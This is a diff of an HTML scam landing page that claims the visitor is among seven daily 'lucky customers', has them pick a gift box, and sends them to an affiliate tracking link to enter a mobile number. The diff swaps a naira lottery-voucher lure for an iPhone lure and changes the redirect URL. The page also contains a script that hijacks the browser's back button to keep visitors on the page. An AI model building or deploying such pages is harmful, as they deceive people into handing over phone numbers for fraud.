--- a/pinbox/e20235231703ncash/index.html
+++ b/pinbox/e20235231703ncash/index.html
@@ -17,7 +17,7 @@
 			<div class="client"><strong>Dear customer,</strong><br>Every day we select 7 lucky customers to receive a
 				reward.
 			</div>
-			<div class="info">All you have to do is to choose the right gift box<br><strong>Find an Lotto voucher (₦100,₦1000,₦100,0000)</strong>
+			<div class="info">All you have to do is to choose the right gift box<br><strong>Find an iphone</strong>
 			</div>
 			<div class="boxs">
 				<div class="box"><img src="img/box.jpg"></div>
@@ -131,11 +131,11 @@
 		}
 		function dialog3() {
 			Swal.fire({
-				imageUrl: 'img/cash.png',
-				html: '<strong>You may be a Winner of:</strong> <h2>Lottery voucher</h2><br><h4>Next Steps:</h4><br>1. You\'ll be redirected to the partner\'s site<br>2. Enter your mobile number<br>3. Get your Lottery prize',
+				imageUrl: 'img/box_iphone.png',
+				html: '<strong>You may be a Winner of:</strong> <h2>Lottery prize</h2><br><h4>Next Steps:</h4><br>1. You\'ll be redirected to the partner\'s site<br>2. Enter your mobile number<br>3. Get your Lottery prize',
 				allowOutsideClick: false,
 				showConfirmButton: false,
-				footer: '<a href="https://blast.radadpro.com/click/">Confirm</a>'
+				footer: '<a href="https://wlid0.bemobtrcks.com/click">Confirm</a>'
 			});
 		}
 		i = 0;
@@ -156,7 +156,6 @@
 		});
 		var date = new Date().toLocaleDateString();
 		document.getElementById('date').innerHTML = date;
-	
 	</script>
 	<script>!function () { var a; try { for (a = 0; 10 > a; ++a) { history.pushState({}, "", "#") } onpopstate = function (c) { c.state && location.replace("#js-landing-url") } } catch (b) { } }();</script>
 </body>
